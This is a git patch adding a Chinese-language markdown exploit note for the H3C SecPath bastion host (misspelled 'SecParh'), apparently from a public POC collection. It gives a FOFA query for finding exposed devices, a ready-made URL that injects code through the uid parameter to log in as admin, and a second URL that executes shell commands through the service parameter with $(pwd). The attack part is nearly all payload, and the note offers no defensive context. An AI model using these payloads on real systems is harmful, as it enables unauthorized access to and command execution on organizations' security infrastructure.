From 523772b05454ec7e64c90aec1b93c0b084f1d1f8 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 6 Mar 2024 17:28:27 +0800 Subject: [PATCH] =?UTF-8?q?Create=20H3C-SecParh=E5=A0=A1=E5=9E=92=E6=9C=BA?= =?UTF-8?q?=E4=BB=BB=E6=84=8F=E7=94=A8=E6=88=B7=E7=99=BB=E5=BD=95=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- H3C-SecParh堡垒机任意用户登录漏洞.md | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 H3C-SecParh堡垒机任意用户登录漏洞.md diff --git a/H3C-SecParh堡垒机任意用户登录漏洞.md b/H3C-SecParh堡垒机任意用户登录漏洞.md new file mode 100644 index 0000000..a9bf226 --- /dev/null +++ b/H3C-SecParh堡垒机任意用户登录漏洞.md @@ -0,0 +1,26 @@ +## H3C-SecParh堡垒机任意用户登录漏洞 + +H3C SecParh堡垒机的get_detail_view.php中存在任意用户登录漏洞。攻击者可以构建一个恶意URL,利用该漏洞进行攻击。 + +## fofa +``` +app="H3C-SecPath-运维审计系统" && body="2018" +``` + +## poc +``` +/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin +``` + +![image](https://github.com/wy876/POC/assets/139549762/8494d9aa-bd2f-4ecb-800f-d27308de54d8) + +![image](https://github.com/wy876/POC/assets/139549762/7a66984a-8669-43e1-a527-e3460fc49501) + + +## 命令执行 + +通过任意用户登录或者账号密码进入后台才可以构造特殊的请求执行命令 + +``` +https://IP地址:端口/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(pwd)&identity_cond=&query_type=all&format=json&browse=true +```